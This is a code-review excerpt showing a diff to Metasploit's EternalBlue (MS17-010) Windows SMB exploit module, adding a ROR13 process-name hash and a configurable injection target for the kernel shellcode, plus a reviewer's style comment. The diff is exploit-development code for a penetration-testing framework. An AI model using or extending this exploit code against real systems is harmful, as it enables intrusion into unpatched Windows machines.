modules/exploits/windows/smb/ms17_010_eternalblue.rb

```diff
@@ -580,13 +580,29 @@ def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)
   # teb_acp = TEB.ActivationContextPointer offset
   # et_tle = ETHREAD.ThreadListEntry offset
   def make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle)
-    sc = make_kernel_shellcode
+    sc = make_kernel_shellcode(proc_name)
     sc << [ring3.length].pack("S<")
     sc << ring3
     sc
   end
 
-  def make_kernel_shellcode
+  def hash(process)
+    # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
+    proc_hash = 0
+    process += "\x00"
+    process.each_byte { |c|
+      proc_hash  = ror(proc_hash, 13)
+      proc_hash += c
+    }
+    return [proc_hash].pack('l<')
+  end
+
+  def ror(dword, bits)
+    return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF
+  end
+
+
+  def make_kernel_shellcode(proc_name="spoolsv.exe")
```

Comment:
If you're not going to use keyword args, you can leave off the no-op variable name. It should be clear enough when called below.